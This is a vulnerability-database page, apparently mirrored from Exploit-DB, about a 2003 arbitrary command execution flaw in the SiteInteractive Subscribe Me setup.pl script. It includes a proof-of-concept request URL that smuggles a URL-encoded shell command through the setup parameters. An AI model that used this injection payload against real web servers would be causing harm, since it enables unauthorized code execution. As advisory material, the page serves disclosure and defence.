SiteInteractive Subscribe Me – Setup.pl Arbitrary Command Execution

SiteInteractive Subscribe Me – Setup.pl Arbitrary Command Execution

漏洞ID 1054306 漏洞类型
发布时间 2003-12-18 更新时间 2003-12-18
图片[1]-SiteInteractive Subscribe Me – Setup.pl Arbitrary Command Execution-安全小百科CVE编号 N/A
图片[2]-SiteInteractive Subscribe Me – Setup.pl Arbitrary Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23447
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9253/info

It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver. 

http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ific
ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

相关推荐: OpenBSD 根使用权许可漏洞

OpenBSD 根使用权许可漏洞 漏洞ID 1207310 漏洞类型 未知 发布时间 1998-08-03 更新时间 1998-08-03 CVE编号 CVE-1999-0062 CNNVD-ID CNNVD-199808-007 漏洞平台 N/A CVSS评…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享